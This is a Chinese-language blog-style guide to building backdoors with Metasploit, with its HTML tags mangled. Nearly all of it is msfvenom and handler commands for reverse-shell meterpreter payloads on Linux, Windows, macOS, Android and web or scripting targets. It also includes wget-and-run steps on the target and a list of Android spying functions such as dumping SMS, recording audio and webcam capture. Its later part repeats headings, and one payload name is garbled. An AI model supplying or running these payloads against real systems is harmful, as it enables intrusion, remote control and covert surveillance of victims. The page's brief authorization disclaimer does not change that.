MSF后门技术全面指南<\/h1>

0x01 前言<\/h2>
后门技术是渗透测试中至关重要的环节，本文详细记录使用Metasploit Framework(MSF)生成各类后门的实战技术，涵盖Linux、Windows、PHP、JSP、ASP以及Android平台的后门生成与利用方法。<\/p>

0x02 MSF生成Linux后门实战<\/h2>

实战背景<\/h3>

目标系统：使用Shiro框架的登录界面<\/li>

漏洞利用：Shiro反序列化漏洞<\/li> <\/ul>

利用Shiro反序列化漏洞<\/h3>

使用Burpsuite抓包识别Shiro特征字段<\/li>
使用专用工具检测并确认漏洞存在<\/li>

成功反弹shell<\/li> <\/ol>

植入Linux后门流程<\/h3>

生成后门<\/h4>

msfconsole
<\/span><\/span>use exploit\/multi\/handler
<\/span><\/span>set lhost xxx.xxx.xxx.xxx
<\/span><\/span>set lport 9991<\/span>
<\/span><\/span>set payload linux\/x86\/meterpreter\/reverse_tcp
<\/span><\/span>run
<\/span><\/span><\/code><\/pre>目标机操作<\/h4>
wget http:\/\/xxx.xxx.xxx\/shell
<\/span><\/span>chmod 777<\/span> shell
<\/span><\/span>.\/shell
<\/span><\/span><\/code><\/pre>0x03 MSF生成Windows后门<\/h2>
实验环境<\/h3>

攻击机：个人VPS<\/li>
靶机：Windows Server 2012<\/li>
<\/ul>
生成Windows后门<\/h3>
msfvenom -p windows\/meterpreter\/reverse_tcp LHOST=<\/span><Your IP> LPORT=<\/span><Your Port> -f exe > shell.exe
<\/span><\/span><\/code><\/pre>MSF监听配置<\/h3>
use exploit\/multi\/handler
<\/span><\/span>set payload windows\/meterpreter\/reverse_tcp
<\/span><\/span>set LHOST <Your IP>
<\/span><\/span>set LPORT <Your Port>
<\/span><\/span>run
<\/span><\/span><\/code><\/pre>0x04 MSF生成PHP后门<\/h2>
实验环境<\/h3>

攻击机：个人VPS<\/li>
靶机：CentOS系统<\/li>
<\/ul>
生成PHP后门<\/h3>
msfvenom -p php\/meterpreter\/reverse_tcp LHOST=<\/span>192.168.2.146 LPORT=<\/span>1234<\/span> -f raw > text.php
<\/span><\/span><\/code><\/pre>目标机操作<\/h3>
wget http:\/\/xxx.xxx.xxx\/text.php
<\/span><\/span>php .\/text.php
<\/span><\/span><\/code><\/pre>0x05 MSF生成Android后门<\/h2>
实验环境<\/h3>

攻击机：个人VPS<\/li>
靶机：夜神安卓模拟器<\/li>
<\/ul>
生成Android后门<\/h3>
msfvenom -p android\/meterpreter\/reverse_tcp LHOST=<\/span>your_ip LPORT=<\/span>your_port R > \/root\/android.apk
<\/span><\/span><\/code><\/pre>Android后门功能<\/h3>

check_root<\/code> - 检查root权限<\/li>
dump_calllog<\/code> - 下载通讯记录<\/li>
dump_contacts<\/code> - 下载联系人<\/li>
dump_sms<\/code> - 下载短信<\/li>
send_sms<\/code> - 发送短信<\/li>
record_mic<\/code> - 录音<\/li>
webcam_list<\/code> - 查看摄像头<\/li>
webcam_snap<\/code> - 拍照<\/li>
webcam_stream<\/code> - 连续拍照<\/li>
geolocate<\/code> - 获取地理位置<\/li>
upload<\/code> - 上传文件<\/li>
download<\/code> - 下载文件<\/li>
shell<\/code> - 获取shell<\/li>
<\/ul>
0x06 MSF生成各类后门总结<\/h2>
Binaries后门<\/h3>
Linux<\/h4>
msfvenom -p linux\/x86\/meterpreter\/reverse_tcp LHOST=<\/span><IP> LPORT=<\/span><Port> -f elf > shell.elf
<\/span><\/span><\/code><\/pre>Windows<\/h4>
msfvenom -p windows\/meterpreter\/reverse_tcp LHOST=<\/span><IP> LPORT=<\/span><Port> -f exe > shell.exe
<\/span><\/span><\/code><\/pre>Mac<\/h4>
msfvenom -p osx\/x86ell_reverse_tcp LHOST=<\/span><IP> LPORT=<\/span><Port> -f macho > shell.macho
<\/span><\/span><\/code><\/pre>Web Payloads<\/h3>
PHP<\/h4>
msfvenom -p php\/meterpreter\/reverse_tcp LHOST=<\/span><IP> LPORT=<\/span><Port> -f raw > shell.php
<\/span><\/span><\/code><\/pre>ASP<\/h4>
msfvenom -p windows\/meterpreter\/reverse_tcp LHOST=<\/span><IP> LPORT=<\/span><Port> -f asp > shell.asp
<\/span><\/span><\/code><\/pre>JSP<\/h4>
msfvenom -p java\/jsp_shell_reverse_tcp LHOST=<\/span><IP> LPORT=<\/span><Port> -f raw > shell.jsp
<\/span><\/span><\/code><\/pre>WAR<\/h4>
msfvenom -p java\/jsp_shell_reverse_tcp LHOST=<\/span><IP> LPORT=<\/span><Port> -f war > shell.war
<\/span><\/span><\/code><\/pre>Scripting Payloads<\/h3>
Python<\/h4>
msfvenom -p cmd\/unix\/reverse_python LHOST=<\/span><IP> LPORT=<\/span><Port> -f raw > shell.py
<\/span><\/span><\/code><\/pre>Bash<\/h4>
msfvenom -p cmd\/unix\/reverse_bash LHOST=<\/span><IP> LPORT=<\/span><Port> -f raw > shell.sh
<\/span><\/span><\/code><\/pre>Perl<\/h4>
msfvenom -p cmd\/unix\/reverse_perl LHOST=<\/span><IP> LPORT=<\/span><Port> -f raw > shell.pl
<\/span><\/span><\/code><\/pre>Shellcode生成<\/h3>
使用msfvenom --help-formats<\/code>查看支持的格式参数<\/p>
Linux Shellcode<\/h4>
msfvenom -p linux\/x86\/meterpreter\/reverse_tcp LHOST=<\/span><IP> LPORT=<\/span><Port> -f <language>
<\/span><\/span><\/code><\/pre>Windows Shellcode<\/h4>
msfvenom -p windows\/meterpreter\/reverse_tcp LHOST=<\/span><IP> LPORT=<\/span><Port> -f <language>
<\/span><\/span><\/code><\/pre>Mac Shellcode<\/h4>
msfvenom -p osx\/x86\/shell_reverse_tcp LHOST=<\/span><IP> LPORT=<\/span><Port> -f <language>
<\/span><\/span><\/code><\/pre>注意事项<\/h2>

实际使用时需替换<IP><\/code>和<Port><\/code>为实际值<\/li>
本文仅用于学习研究，请遵守法律法规<\/li>
实际渗透测试需获得授权方可进行<\/li>
<\/ol>
参考资源<\/h2>

MSFvenom使用指南<\/a><\/li>
渗透测试技术博客<\/a><\/li>
<\/ol>

MSF后门技术全面指南<\/h1>

0x01 前言<\/h2> 后门技术是渗透测试中至关重要的环节，本文详细记录使用Metasploit Framework(MSF)生成各类后门的实战技术，涵盖Linux、Windows、PHP、JSP、ASP以及Android平台的后门生成与利用方法。<\/p>

0x02 MSF生成Linux后门实战<\/h2>

植入Linux后门流程<\/h3>

0x03 MSF生成Windows后门<\/h2>

0x04 MSF生成PHP后门<\/h2>

0x05 MSF生成Android后门<\/h2>

0x06 MSF生成各类后门总结<\/h2>

Binaries后门<\/h3>

Web Payloads<\/h3>

Scripting Payloads<\/h3>

Shellcode生成<\/h3> 使用msfvenom --help-formats<\/code>查看支持的格式参数<\/p>

参考资源<\/h2> MSFvenom使用指南<\/a><\/li> 渗透测试技术博客<\/a><\/li> <\/ol>

0x01 前言<\/h2>
后门技术是渗透测试中至关重要的环节，本文详细记录使用Metasploit Framework(MSF)生成各类后门的实战技术，涵盖Linux、Windows、PHP、JSP、ASP以及Android平台的后门生成与利用方法。<\/p>

Shellcode生成<\/h3>
使用`msfvenom --help-formats<\/code>查看支持的格式参数<\/p>`

参考资源<\/h2>

MSFvenom使用指南<\/a><\/li>
渗透测试技术博客<\/a><\/li> <\/ol>